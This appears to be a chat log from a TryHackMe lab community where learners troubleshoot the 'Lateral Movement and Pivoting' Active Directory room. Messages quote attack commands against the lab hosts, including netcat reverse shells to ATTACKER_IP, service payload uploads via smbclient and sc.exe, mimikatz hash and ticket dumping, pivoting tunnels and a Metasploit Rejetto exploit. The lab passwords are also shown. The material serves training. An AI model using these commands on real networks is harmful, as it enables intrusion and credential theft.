This happens if you open the attackbox and try to connect from your machine at the same time, because they fight to connect using the same vpn profile

Hmm. okay I'll check again

Anyone who have 10.200.51.X can help me restart network ? (2/5)

Problem with 10.200.51.X after reset network( i can't connect to any machine)

Hey there, did you try regenerating the ovpn file from the website?

Yep

can you ping any of the hosts in the network?

Yes

I try on my kali amd attack box after configure dns on attack box

if you can ping, then it might be an issue with your dns configuration. Can you try running nslookup thmdc.za.tryhackme.com 10.200.51.101 and send a screenshot of the output?

I didn't change any dns setting + it was working perfectly last night
When start PC I will take a screenshot with command output

alright!

You are probably set to go. Try to navigate to http://distributor.za.tryhackme.com

it should work

Nope, don't work

can you DM me so we can check?

Problem persist after few resetart of network

Did anyone solve task6?

Hey guys, i assume the network is no longer working

at least on my side

even though i confugured DNS, i can't navigate to http://distributor.za.tryhackme.com/

i can't even ping the domain controller

but i can ping THMJMP2

Is the problem only on my end or is it fo everyone ?

check this http://distributor.za.tryhackme.com/creds

I also have issue in dns

What network are you on? (10.200.x.y)

It is working perfectly after reset

Thank you !

Help

i can't connect VPN lateral-movement...

i can Solve
Replace the cipher AES-256-CBC line in your .ovpn config with data-ciphers AES-256-CBC

any idea why systemd-resolve is not found on Kali?
└─# systemd-resolve systemd-resolve: command not found

There are separate instructions on configuring your DNS in Kali environments in the room. I'm not sure if Kali ships with systemd-resolved

vote reset plz thmjmp2 is not accepting either ssh or rdp connections

Please specify what subnet you're in when this happens. You should also ping the machine to confirm if you have a stable vpn connection

sorry but a reset took place, solved the problem, can't verify that for you now

hihi how do it fix this?

i'm on ssh tunnelling

hi anyone completed Exploiting Kerberos Delegation?

hi anything wrong w THY

THM exploiting AD

it's v slow

i took a long time to get credentials

does anyone encounter this when trying to rdp? [03:23:27:416] [23768:23769] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[03:23:27:416] [23768:23769] [WARN][com.freerdp.crypto] - CN = THMJMP2.za.tryhackme.com
[03:23:30:478] [23768:23769] [ERROR][com.winpr.timezone] - Unable to find a match for unix timezone: Canada/Eastern
[03:23:30:783] [23768:23769] [ERROR][com.freerdp.core.connection] - license connection sequence aborted.
[03:23:30:783] [23768:23769] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
[03:23:30:784] [23768:23769] [ERROR][com.freerdp.core] - rdp_client_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[03:23:35:265] [23768:23769] [ERROR][com.winpr.timezone] - Unable to find a match for unix timezone: Canada/Eastern
[03:23:35:669] [23768:23769] [ERROR][com.freerdp.core.connection] - license connection sequence aborted.
[03:23:35:669] [23768:23769] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
[03:23:35:669] [23768:23769] [ERROR][com.freerdp.core] - rdp_client_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[03:23:35:669] [23768:23769] [ERROR][com.freerdp.core] - freerdp_post_connect failed

Checking on this. I'll get back to you in a bit.

@shadow linden Good morning, afternoon or evening. I'm facing a rather serious problem with Task #5 - Use of Alternate Authentication Material:
The User "t1_toby.beck" repeatedly refuses to show in the hashes of "thmjmp2.za.tryhackme.com" - what am I missing? Third day in a row - tried at different times... Subnet is 10.200.51.0/xx Thanks

Gave +1 Rep to @shadow linden

Give me some minutes to check on this

Both problems seem to be related. A fix is on the way. I'll keep you posted on it as soon as the fix gets deployed.

Thanks in advance

Followup to this issue: Today I was able to find the hash for t1_leonard.summers - still no t1_toby.beck thoug - perform the PtH attack and the winrs command - even found the flag.exe files in t1_toby.beck and t1_leonard.summers Desktops but executing both yields - the expected - you're missing something message ...

Are you fix it?

when I using t2 user credential obtained from distributor.za.tryhackme.com/creds_t2. I accept the license with xfreerdp and then, it gives me the following error - 'license connection sequence aborted.' its Lateral Movement and Pivoting task 6. How to fix it?

Hi, I am facing error at task 5

I cannot dump bob.jenkins user's ntlm hash with sekurlsa::msv

only dump t2_user

Good morning - daily update: New subnet 10.200.48.0/24 - same problem as mentioned before - to top it off mimikatz.exe vanished from the C:\Tools directory on thmjmp2

hi, anyone here having issue when connecting to thmjmp2?

I got this

ssh za\\tony.holland@thmjmp2.za.tryhackme.com Connection reset by 10.200.64.249 port 22

Munra said, they're working on it ... but no timeframe for the fix has been announced yet

hi, anyone here having issue with this network?

i'm unable to ping dc ip and other machine ip as well, subnet is 10.200.64.0/24

Hi, do you know this error anyone ?

─(root㉿kali)-[/home/pentest/thm/ltmovad]
└─# xfreerdp /v:thmjmp2.za.tryhackme.com /u:t2_kelly.blake /p:8LXuPeNHZFFG
[00:57:30:972] [3305:3306] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[00:57:30:972] [3305:3306] [WARN][com.freerdp.crypto] - CN = THMJMP2.za.tryhackme.com
[00:57:37:616] [3305:3306] [ERROR][com.freerdp.core.connection] - license connection sequence aborted.
[00:57:37:616] [3305:3306] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
[00:57:37:616] [3305:3306] [ERROR][com.freerdp.core] - rdp_client_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[00:57:49:883] [3305:3306] [ERROR][com.freerdp.core.connection] - license connection sequence aborted.
[00:57:49:883] [3305:3306] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
[00:57:49:883] [3305:3306] [ERROR][com.freerdp.core] - rdp_client_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[00:57:49:883] [3305:3306] [ERROR][com.freerdp.core] - freerdp_post_connect failed

Hello everyone 🙂
I am having troubles finding any information about t1_toby.beck. I tried every attack with the different scan methods but he won't show up at all.
Any ideas?

there is t1_toby.becker, ntlm hash starting with 533f and ending with 60fe

that's weird... I can't seem to find it

just now I tried in thmjmp2, it is there, using sekurlsa:msv. please try again. drop me a pm if you want the hash directly.

hi @dense badge did you solve it?

Hey everyone, this room is currently undergoing maintenance. Sorry for the issues. The problem has been escalated and a solution is on the way 🙂

hi @shadow linden just want to check, did you find any issue with rdp? thanks

Gave +1 Rep to @shadow linden

ok, thanks for your update.

There is a known issue ATM. RDP isn't working indeed

Is there any indication of when the maintenance will be completed?

Sorry for the delay. The network should be up and running now

cc @feral dew @fierce vector @dense badge @frank temple

Thanks @shadow linden - now I was able to complete the final 3 tasks in this room!

Gave +1 Rep to @shadow linden

Hello guys, I am doing from Lateral Movement and Pivoting the Spawning Processes Remotely task, and I can't upload myservice.exe via smb. Can you please help me? Terminal: # smbclient -c 'put myservice.exe' -U t1_rachael.atkinson -W ZA '//thmiis.za.tryhackme.com/admin$/' Zjqf3489
WARNING: The "syslog" option is deprecated
session setup failed: NT_STATUS_LOGON_FAILURE. I try to edit file /etc/samba/smb.conf an then restart service, but it doesnt work - Attempt #1: # sudo service samba restart
Failed to restart samba.service: Unit samba.service not found. Attempt #2: # sudo systemctl restart smbd
Failed to restart smbd.service: Unit smbd.service not found. Attempt #3: # sudo systemctl enable smb.service
Failed to enable unit: Unit file smb.service does not exist. Thanks a lot.

Hi Do you trie to replace thmiis.za.tryhackme.com by the ip address ?

Hello everybody, I would like to understand on the task3 we connect by ssh on the user in my case the user is tracey.turner and after that we execute the command runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4443" to use reverse shell and we are connect with tracey.turner access (because we use the argument netonly. finally we use the command sc.exe \\thmiis.za.tryhackme.com create THMservice-3249 binPath= "%windir%\myservice.exe" start= auto why in the example we execute the runas command because at the end we are already connected with tracey.turner access ? Thanks a lot

Finally I understood, we need to execute the runas /netonly command because after we are connected with the TOKEN of **t1_leonard.summers ** and the next commands with sc will be executed with the t1_leonard.summers permission.

@last geyser Yes, same result: # smbclient -c 'put myservice.exe' -U t1_george.kay -W ZA '//10.200.64.201/admin$/' Jght9206
WARNING: The "syslog" option is deprecated
Connection to 10.200.64.201 failed (Error NT_STATUS_IO_TIMEOUT)

Hey there, are you using your own machine or the attackbox?

Ah I see the problem. For task 3 you are supposed to use t1_leonard.summers account

the one you are trying to use doesn't exist

@shadow linden Attackbox. Oh, I thought I was supposed to use the credentials assigned to me in Task 1 from http://distributor.za.tryhackme.com/creds. But still: # smbclient -c 'put sss.exe' -U t1_leonard.summers -W ZA.TRYHACKME.COM '//thmiis.za.tryhackme.com/admin$/' EZpass4ever
WARNING: The "syslog" option is deprecated
session setup failed: NT_STATUS_CONNECTION_RESET

@shadow linden I finally solved - when it wasn't working I watched the youtube walkthrough and guy was replacing -W ZA with -W ZA.TRYHACKME.COM. Then I revert changes and add only leonard.summers credentials and it work. So thanks man! Term: # smbclient -c 'put myservice.exe' -U t1_leonard.summers -W ZA '//thmiis.za.tryhackme.com/admin$/' EZpass4ever
WARNING: The "syslog" option is deprecated
putting file myservice.exe as \myservice.exe (316.3 kb/s) (average 316.3 kb/s)

Gave +1 Rep to @shadow linden

Glad it works! 🥳

Can someone reset this room, cant connect to it at all :/

If anyone happens to be in the 10.200.75.x subnet, could you vote for a reset? Task 7 seems to not be creating sessions at the moment when exploiting rejetto.

I'm stuck on task 7... I'm not getting sessions from Rejetto, anyone able to help? it seems 7777 was in use, so I switched to 7575 and i'm just getting Exploit completed, but no session was created.

hello

Hi there.

I'm doing the Task 4 "Moving Laterally Using WMI",
everything is just fine until the flag.exe.
I've seen people also struggling in this server, but no concrete answer,
any ideas ?

Ah seems like I have found an answer

I will try again later and confirm here afterwards

👍

Do you found any answer? I'm stuck here too. Thanks.

Gave +1 Rep to @lilac kite

Hey there, sorry for the late response. I tried replicating the error, but it all works as expected for me. If you are using the attackbox, be sure not to use port 7777 as it seems to be in use already by some other process

Zwiad — Today at 18:24
Heya
I m doing the Lateral Movement Network. Got into the IIS machine but when the Flag.exe is ran , it displays: Sorry! You're still missing something, no flag for you yet (7)
my guess is that I didn't auth properly against the DC with /netonly
because that's the only thing I could've f'ed up without knowing about it. Having said this, I have no idea how to do that properly and yes I did complete the adenum network before this one
Could sb give me a nudge or something pretty please?
Also, say in case that nc64.exe wasn't available , can we just upload the bin ourselves? Like precompiled socat one for example? Having nc installed like that seems all too convenient
Zwiad — Today at 18:36
Oh and I decided to use a cmd reverse shell instead of meterpreter. I don't like relying on metasploit :D

In the meantime I will just download the .exe and dig around, maybe I will find a flag in it like this LMFAO

Okay nevermind I m forgot how to transfer files over from that to my VMbox machine. Gonna wait for sb to tell me what I m doing wrong. :D

Hey there, which task/flag is this?

Task 3

so? no dice ?

oh you're one of the creators lol. Cool

Hey there, sorry for the late response. I was a bit disconnected throughout the weekend. The error you are getting is related to your shell process being spawned in a different way than expected. Are you following the guide as-is, or doing some variations to it?

Oh and I decided to use a cmd reverse shell instead of meterpreter. I don't like relying on metasploit :D

This maybe?

aside from that not really

and yes I m using the exe-service format

But aside from that I use sc.exe as shown no other variations lol

Ah I see. The flag checker is actually looking for some evidence that you completed the task. As you may guess, building a "generic" checker that accounts for all possible variations is quite hard, so in this case the check that is failing is actually the last one, and might be bound to the way meterpreter starts. I'd suggest you use the proposed method in this case for the moment.

hi

the room beginning requires connecting to the lateral movement ovpn

but when i check my access

i didn't see it

@shadow linden

Hey there, be sure to join the room before trying to download your ovpn profile

if that doesn't work, let me know

I already joined

But when I go to my access page I can't find the ovpn configuration file

Would you mind sending a screenshot so I can check? I'll send you an invite in case you prefer to DM it

Alright let me send the screenshot

can someone please hit the reset if ur on 10.200.19.*

oh

Guys, I'm unable to access the network

Not via local machine and not via Attack Box too

I never follow the full instructions they set in the first task. On my local machine, all I do is open up /etc/resolv.conf and comment out my VMWare's nameserver IP and add an additional nameserver for the IP of the DC for the room. Works perfectly. If I need internet access outside of their network, that's what my Host is for. Easy copy/paste. And if I need to update a tool/download a new tool, I just disconnect from the VPN quick, change which nameserver is commented out, and then download/update the tool. Then revert back to how it was before and reconnect the vpn.

EDIT: fixed a typo for resolve.conf to be corrected to the actual name /etc/resolv.conf

Hey there, sorry for the late response. You need to replace $THMDCIP with the IP of your assigned THMDC.

Aha okay!

Did that, still :(((

Even this didn't work for me 😦

why lateral.ovpn can't connect?

It can, but via that also I am unable to access distributor.za.tryhackme.com

Be sure to put the IP of THMDC as stated on your room's diagram

it should look like 10.200.x.101

Is lateralmovementandpivoting .ovpn ok? i can't connect to it ,but i can connect to other ovpn like ADenumerate.ovpn.

@shadow linden

If the connection keeps on resetting, try regenerating your ovpn file in the website and that should do the trick

i have try regenerate it.

Maybe this vpn'ip is blocked by GFW?

@shadow linden

That may also be the case. If you want to, feel free to DM me and we can run a couple of checks

Oh okay

Did that, still inaccessible @shadow linden

Restarted network manager too

Can you send me the output of the following command: nslookup thmdc.za.tryhackme.com 10.200.48.101

Here you go

What is the output of your /etc/resolv.conf file? Blur out or take out/delete out your VM's nameserver IP when you post it so you don't expose that (just to be safe).

Your resolv.conf file should look like this:

Generated by NetworkManager

search localdomain
nameserver [your local nameserver IP here - mine is given to me by VMWare]

You need to modify it to be like this:

Generated by NetworkManager

search localdomain
#nameserver [your local nameserver IP here - mine is given to me by VMWare]
nameserver 10.200.*.101 (fill in the dot with whatever your room says the DC is)

Doing this doesn't work for you? Is your VM set to NAT? You're correctly connected via the lateralmovement.ovpn file that you generated? And sorry, I edited my comment here. I misspelled the resolv file as resolve.conf. It's just resolv.conf. If you did it exactly how I mentioned before, you probably just created a new file at /etc/resolve.conf, which doesn't work for anything. Sorry about that. My bad! Stupid typos get you every time. The proper spelling of the file is resolv.conf.

EDIT: and hey, maybe the better option is to just absolutely leave the room and load up into a different 10.200.*.101 environment. I just had a similar issue with exploitingad. Only thing that worked for me to resolve it was to leave the room and join a new *.101 (moving from .60.101 to .79.101). Now it's working just like normal.

In this case, the server is down. Be sure to check if the network has been started from the website. If it shows as "running", then the network might need a reset.

oh and there seems to be a typo in your IP

in the command it reads 10.200.28.101 instead of 10.200.48.101 which is what you had in some images before this one

Argh shoottt. Now nslookup works as expected but still I am not able to navigate to http://distributor.za.tryhackme.com/creds.

if nslookup works, then the DNS server is up and running,. I'd go with what dekker proposed and just edit /etc/resolv.conf to point to THMDC's IP address. If your browser still doesn't load the website, it may be related to cache preventing you to do so. Instead of using your browser, do a curl http://distributor.za.tryhackme.com/creds and that should output some HTML if your DNS is correctly set up. It that works, just close and reopen your browser to avoid any caching and it should work at last

It's a browser cache problem because curl is also not able to resolve the host. /etc/resolv.conf does point to THMDC's IP address too.

Here you go

I also reset the network, yet unable to reach the abovementioned link

i can connect to the ovpn but having trouble setting up the DNS part (after connecting) with /etc/resolv.conf

@ocean locust im having the same problem

Yeah I mean, I don't know what do at this point. Completely hopeless @dense saffron

wanna vc?

In your case, the DNS is actually set up. if you pop up a browser it should work.

it may not be clear since nslookup tells you that resolution is failing, but this is a behaviour specific to nslookup in the current network setup. Your navigator should work without a problem

In your case, give me a sec and I'll try to replicate what you are seeing

Here's what I get with the exact same steps

I can't really say what may be happening for you, but I'll send you an invite so you can DM me and we can do some further checking if you want 🙂

Now that I re-read your resolv.conf, if you have an additional nameserver before THMDC (which I believe you have in the blurred part of your image), that one takes priority and most programs like curl will fail. Be sure that the first DNS server in your resolv.conf is THMDC, or else it won't work

Here's what I get if I switch the order of the DNS server in my resolv.conf:

looks like that may be it

@shadow linden so im in ...but cant use smbclient to put that service-exe in...

nvm...sometimes im too autistic for my own good lol

I mean the first two are my VM's nameserver IPs

Ie, created by NetworkManager

You have to comment those out. Put a # before them.

HELLO

Room: https://tryhackme.com/room/lateralmovementandpivoting
Task: 3

I am unable to use smbclient and upload payload to admin$ in thmiis machine

Please help

I'm guessing its the password at the end? 🙂
Don't provide the password as an argument, calling the command. You should be prompted for the password when signing in 🙂

can we reset reset the network in the subnet 10.200.51.X? seems there is a problem with DNS there
i cant connect neither on the attack box nor on my VM

Hey, the account you are using is an unprivileged one, and therefore has no access to admin$ on THMIIS. Be sure to use t1_leonard.summers and it should work.

Oh okay

guys anyone free to talk about Task 3 Spawning Processes Remotely

just a couple of questions

||why are we using a netcat? I mean Its very unlikely to find and know the location of nc on windwos. If its just for task why not make us upload it by ourselves using smb and calling it using smbpath in runas, that would've made much more sense right?

why are we using THMJMP2 to use runas? cant we just do that by SSHing into t1_leonard.summers@THMIIS? well ofcourse it might be to prove the point that we cant have ssh all the time but it is a possibility right?||

||ofcourse you actually dont need to use runas at all if you can ssh into the leonard.summers account but here you can't access the flag if you dont do the pvioting||
||also why are using services to spawn a shell? just to get nt authority shell?||

I'm curious about answers to that last question, too. I assumed the variety of approaches demonstrated in these rooms was more for exposure than anything else, to get noobs (of which I am one) recognizing and thinking about the myriad ways to compromise.

Can i tag room creator?

What is his @

That's a lot of questions. So here it goes:

1. why are we using a netcat?
   nc is present on the machines to avoid you from having to upload it many times, as we need it in several points of the room. The idea is, indeed, that you can somehow upload it there (using smbclient, ssh or any other method available)

2. why are we using THMJMP2 to use runas?
   Since this is a red teaming scenario, the idea is that you somehow got access to a single host (it could be by a phishing campaign or some other method), and you have to run any commands from there usually. While there's no real restriction on using SSH to log into other machines and running commands directly, the assumption is that any logins are being logged and reviewed by the blue team (the enemy). This is why it is important having several ways of running commands remotely, as some methods might be less obvious for an untrained blue team.

3. why are using services to spawn a shell?
   Again, to try and avoid being detected by using non-conventional methods of doing stuff

Hopefully that helps

Now keep in mind that you are not guaranteed to avoid detection by using these methods. All of them should be well known by any decent blue team. However, having as many methods in your arsenal as possible will help you when tackling different scenarios. There will be networks hardened to avoid such things as services sending remote commands, and there will be networks where the blue team might just disregard a service doing funny things

c.c. @fiery tundra @sullen raptor

this is awesome info thank you @shadow linden !

Gave +1 Rep to @shadow linden

thank you for answering every question.

Gave +1 Rep to @shadow linden

Hey all, I’m on Task 5 and have used PTH and PTK to get a cmd running with the injected ticket of t1_toby_beck. However, I am struggling to get the winrs command to work, it says “the username or password is incorrect”.

Does this mean that my original hashes are incorrect?

It's hard to say from the image. If other tools worked, this one should too, but it depends on the PtH or PtK to be done properly. I'd probably start from scratch and see if it works that second time.

For Task 3, when executing Netcat using the supplied "runas" command, upon receiving a shell when I type in "whoami", it still reads back NOT as leonard.summers, but as the user I was executing the runas command with. Is this the intended result? I ask the question because "Flag.exe" displays an error message

it makes me think that despite running the netcat command as "leonard.summers" using the supplied command, it in fact did not run the command as Leonard

Can someone please reset the password for t1_leonard.summers back to EZpass4ever

Task 7 Port Forwarding
is it possible to do Rejetto HFS task with socat? @shadow linden
if yes I tried this on THMJMP2
socat TCP4-LISTEN:8080,fork TCP4:THMDC.za.tryhackme.com:80
socat TCP4-LISTEN:4444,fork TCP4:My_lateral_IP:4444
socat TCP4-LISTEN:5555,fork TCP4:My_lateral_IP:5555

and did as mentioned in the picture on my attack machine. I have no idea why it didnt work first time and worked on second time. after that i tried again a couple of times its just keep failing.

am i doing it right?

I was trying to change the srvhost bit accidentally changed LHOST ofcourse it went to default. The main difference is the URL

What you are doing with socat seems right. I think the second time it worked because of the mistaken IP, actually. By putting THMJMP2's IP as LHOST, the payload on your exploit connected back to THMJMP2. If you set your own IP, without setting ReverseListenerBindAddress to the right address, your payload will try to connect to you directly, which is forbidden by firewall

The reason it doesn't work on further attempts is probably related to ReverseListenerBindAddress not being correctly set

If I remember well, you will still get your original user from whoami instead of t1_leonard_summers. The reason for this is that the credentials are loaded in memory, but not checked against the AD, so the account might not even exist. When you do sc.exe from that console, if your credentials are wrong, then you will get an error. If no error is shown, your credentials should be right. Can you copy/paste the error you are getting from flag.exe? there should be a number at the end of the error msg.

the number was "7"

It said something was still missing and had the number 7 at the end of the message

are you using the same payload as in the example? windows/shell/reverse_tcp

if you use another, the flag checker might get confused

yes, I tried that as well as a few other ones to see if that was the issue. All of them were executed from the AttackerBox which uses MSF5

that's weird... Let me try to replicate it

It works for me

be sure to run flag.exe from the reverse shell you get on the metasploit handler

not the nc one

and just to confirm, this is the result of whoami in the runas console:

so it doesn't show you leonard summers

oh, and if you run whoami on the reverse shell that the service spawned, you should get SYSTEM

thank you for taking the time to perform a detailed verification. I will go back through and see if I am successful.

Gave +1 Rep to @shadow linden

Hello,

I'm stuck on task3, whenever I try to nc from THMJMP2 to my attack machine the spawned cmd is using the wrong account (the one generated by Credential Provider web page instead of t1_leonard.summers)
I can proceed to create the service and start it but the rev shell will say that the session is not valid.
Is there something that I'm missing?

When I try to run runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4443" it's going to run it as the unpriviledged user

nvm saw that someone had the same issue, Ill try to check the generated payload to see if it's the same thing

Task 7 - Rejetto flag.... having an issue. I can see the app on thmdc... but getting "Exploit Completed, but no session was created."

Well I'm an idiot... I was creating my ssh tunnels from thmiis, not thmjmp2

I can't connect to the machine

Is someone else having the same problem now?

Can confirm that Task3, if a meterpreter payload is used (accidentally cough 😉 , flag.exe does not produce the flag. That's pretty neat. I wonder how 'it' knows.

Which machine? DNS is not working for me - from my own Kali VM. I can reverse DNS but FQDN look ups results in a 'Got recursion not available from 10.200.19.101, trying next server"

I've had to do IP address only stuff at the moment. DNS resolves properly from thmjmp2 however.

I can't even ping any of the machines

I think that's not the same subnet of the network I have

I'll just do another room and see if it is fixed in a few hours

ok - yeah I'm on 10.200.19.x

TiL - after today's reset, executing psexec64.exe as Leonard Summers from an SSH prompt 'hangs'. The initial EULA popup was the culprit. I will now include -accepteula as a command line parameter no matter what.

Happening to me this morning. Network is "Running" but I cannot ping the THMDC. This happened to me in Enumerating-AD. It eventually corrected itself in that situation. I expect its something with the AWS infrastructure.

Restarted attackbox and I can now Ping.

Experienced the same issue this morning. I still have some strange network behavior on this box, OpenVPN gets disconnected very often (works just fine on other boxes), Also the accesses to thmjmp2 are not working as expected (from the attackbox) after having obtained credentials, getting connection-reset issues

ssh za\\grace.brooks@thmjmp2.za.tryhackme.com
Connection reset by 10.200.51.249 port 22

Why do we get a shell as nt authority\system after Invoking the .msi installer if we are executing it as t1_corine.waters administrator? Shouldn't we get a shell as t1_corine.waters

I wondered that myself. Noticed it when I installed the payload for the 'service' task as well

rules for how msi installers get installed and stuffs... it has some registry keys and properites that can make it run the installer as a high privilege user which does not drop when you get a shell form one

By default, any service you create will run as SYSTEM, unless you specify otherwise. You can take a look at the obj parameter of sc.exe create in case you want to force a service to run as any other account: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/sc-create

notice that you won't be able to use an arbitrary account to run a service. It needs to have the Logon as a Service privilege assigned beforehand. You can check how to add that privilege via security policies here : https://winshuttle-help.s3.amazonaws.com/foundation/en/assigning-user-account-login-as-service.htm

Cheers! Great information Munra and Shadow. Creating a service for a quick "net user xxx yyy /add" was a cool leveraged use of these permissions.

I think that's the AlwaysInstallElevated privilege

yuup that is the one... did not recall its name

I'll have to do it again to check if it has the registry keys set

But in that task we are installing an msi package, not creating a service

Sorry, I was answering what Sir No1 mentioned. This machine shouldn't have the AlwaysInstallElevated enabled

What that registry entry does is allow a non-admin user to install packages as SYSTEM. In your case, you are already an admin (t1_corine.waters), so you can always install a package with SYSTEM privileges.

That makes sense, so if we are Administrator on a machine we can move to System?

yes, in many ways

I didn't know that, thanks!

Gave +1 Rep to @shadow linden

you can abuse services, msi, task scheduling and some other methods

I just completed the room, the last pivoting challenge was hard to grasp

I think I understand it but I'll probably need to make a diagram to have a clear picture

In Task 3, how to do it with PsExec? I tried with

CKME.COM\t1_leonard.summers -p "EZpass4ever" -i cmd.exe ``` 
and i get:
Couldn't access thmiis.za.tryhackme.com:                                        
The specified network name is no longer available.  
And when i use the ip instead, i get access denied.

Is the network running? Has your VPN connection timed out? Or someone changed the password on you.

That's strange, because in the task we're uploading to the admin$ with smbclient

You could try to spawn a shell as t1_leonard.summers a execute the psexec command in that cmd
runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4443"

I'll try that, thanks

Gave +1 Rep to @delicate reef

I tried both now and both don't work.

za\henry.bird@THMJMP2 c:\tools>PsExec64.exe \\thmiis.za.tryhackme.com -u ZA.TRYH
ACKME.COM\t1_leonard.summers -p "EZpass4ever" -i cmd.exe                        

PsExec v2.34 - Execute processes remotely                                       
Copyright (C) 2001-2021 Mark Russinovich                                        
Sysinternals - www.sysinternals.com                                             

Could not start PSEXESVC service on thmiis.za.tryhackme.com:                    
Access is denied.                                      ```

and from that nc shell i get:

Microsoft Windows [Version 10.0.17763.1098]Connecting to thmiis.za.tryhackme.comStarting cmd.exe on thmiis.za.tryhackme.com...yhackme.com...
cmd.exe exited on thmiis.za.tryhackme.com with error code 0.

This is a bit tricky, given the setup here. What you got from the nc shell from the runas command is actually executing cmd.exe via psexec64, but not returning any control of the console on thmiis to you. Instead, the process just closes immediately.

If you want to get a usable shell from there, you could try PsExec64.exe \\thmiis.za.tryhackme.com -u ZA.TRYHACKME.COM\t1_leonard.summers -p "EZpass4ever" -i "C:\tools\nc64.exe -e cmd.exe ATTACKER_IP 1234" and receive the shell using a new nc listener on port 1234

In case you are wondering why you can't just run psexec from your ssh console and have to do that extra step pointed by David, it seems psexec will try to run the service it installs on the remote host with your current session's credentials instead of the ones provided with -u/-p

I got the shell with runas like David said. But it is still not working

You're listening on 4443 but your nc command line is attempting to connect to 1234

i had another tab open with nc -lvp 1234 that didn't get the connection

This "Connection reset by 10.200.51.249 port 22" problem when trying to SSH to thmjmp2 seems to be an on-going problem.
Pretty annoying to waste a bunch of time troubleshooting this...

Has anyone found a workaround?

Hey there, your best bet is to try and reset the network. It should work straight away after it

what the hell?

why I can't see the flag for Task 5

Nevermind I got it

How did you solve it @minor helm ?

I have the same problem. I try using winrm and i get connected to thmiis.za.tryhackme.com as t1_leonard.summers but it won't show me

what task are you in tho

It's Task 3

Ohh I see..I'm done on task 5 now

Have you tried other methods

I'll get back to you tomorrow since it is currently midnight now and I'm gonna get some sleep.

What I suggest is redoing some of the methods taught tho

Yes, i am already done with the room. Just want to try out the other methods but so far nothing works ^^

got the samw prob on task5 earlier with that

I just tried others and voila got the flag

dont know why it is showing that message

Me neither. Would love to find out though.

Yep..That seems a little bit unknown to me lol

Hey, the reason it isn't working is because you need to use the same method presented in the room to get the flag. You are free to test other methods, but that flag will only work if you get your shell from a service.

Trying to replicate Task3 > PsExec in this room, but when I run PsExec the command seems to hang and does not complete.
CMD: psexec64.exe \\MACHINE_IP -u Administrator -p Mypass123 -i cmd.exe

Also, it is unclear to me which remote MACHINE_IP I should be running the PsExec command against.
I have tried all the IP Address in the LAN (10.200.51.101, 249, and 201) and the command just hangs.

Any help would be greatly appreciated.

Hey, for every task you are presented with the methods and example commands at the start. Each task has a "Let's get to work" section where you are given the credentials and targets you can point to

while the "let's get to work" sections only showcase a single method, you can use the same credentials and targets to practice the rest of the methods if you want. Most if not all methods presented should be possible to use in the network.

so for task 3 you should be able to use t1_leonard.summers and the provided password against thmiis

the network seem to be down...

was able to access 5 mins ago..

Hello, in the lateral movement and pivoting room the thmiis machine does not work.

I did not have a question, you have a technical error, because the machine is not even pinged. Could you tell that to the administration?

The error is that the machine does not work...

Not even a ping.

ok

Neither from the attackbox machine nor through a vpn connection.

are you using a vm or the attack box( mainly)

in order to connect to the network you need to download its specific vpn from the access page

I use both

I know, I downloaded the connection, the domain controller and other machines work

I kown

I did.

Can you

cat /etc/resolv.conf ?

It's not my fault.

I use a windows machine to connect to the vpn.

Is it your host?

But the thmiis machine is not even pinged from the attackbox machine

Maybe they use their windows host

they?

Man, I have already connected by all possible methods, but the ping to the machine still does not go.

Yes, they...

Please try it yourself. Connect to vpn and try to ping thmiis machine

I can't even see the room, I'm not a sub.

miha

youre already connected on thmjmp2 right?

yes

Are you on their subnet?

they could be on a different subnet.

What subnet are you on?

It's the third octet on the THMDC.

My guess is either the network is on, or the nameserver is wrong

10.200.71.201

i wonder how is that the ssh connection on jmp2 suceeded but thmiis dont

i mean

if one machine is working then all of them should

And it doesn't work, it's not even pinged.

I'm connected to vpn, all machines except 1 work, it's not me who has the error.

71 subnet

screenshot

https://ibb.co/sH0bjDg

Let me make a video so you can finally understand me

I am trying to do Task5 using the Pass-the-Ticket (PTT) method.

• But, when run sekurlsa::tickets /export from Mimikatz on JMP2, I do NOT get any tickets for t1_toby.beck (without any numbers at the end) only two for t1_toby.beck4 and t1_toby.beck5
• I tried PTT with t1_toby.beck4 and got to THMIIS but am NOT able to run the flag.exe
• Watched @dull crystal's video (thank you!) and saw he does get a ticket for t1_toby.beck (without any numbers at the end).
• Am I missing something for the PTT method?

Yooo thanks for the shout out! It was quite awhile when I did that network so do not remember all the details. @rose kernel might be able to provide some insight though, as he created those networks!

Gave +1 Rep to @reef plaza

Guys I am on task3 but THMIIS seems not working when I try to ping it from JMP host and also using Psexec

Hi all,
is any one managed to go through the last task namely Task 7 Port Forwarding
the exploit dosen't work though ssh forwarding seems to be good and working

i'am stuck on this last task 😢

here what i got :
msf6 exploit(windows/http/rejetto_hfs_exec) > run

[] Started reverse TCP handler on 127.0.0.1:7878
[] Using URL: http://THMJMP2.za.tryhackme.com:7676/xuLbqQSh69Y
[] Server started.
[] Sending a malicious request to /
[] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\IQyXlaLtsjH.vbs' on the target
[] Exploit completed, but no session was created.

the cmd used on pivot machine to make local & remote port forwarding :
ssh MyUser@myIP -R 80:THMIIS.za.tryhackme.com:80 -L *:7676:127.0.0.1:7676 -L *:7878:127.0.0.1:7878 -N

the exploit run with metasploit :
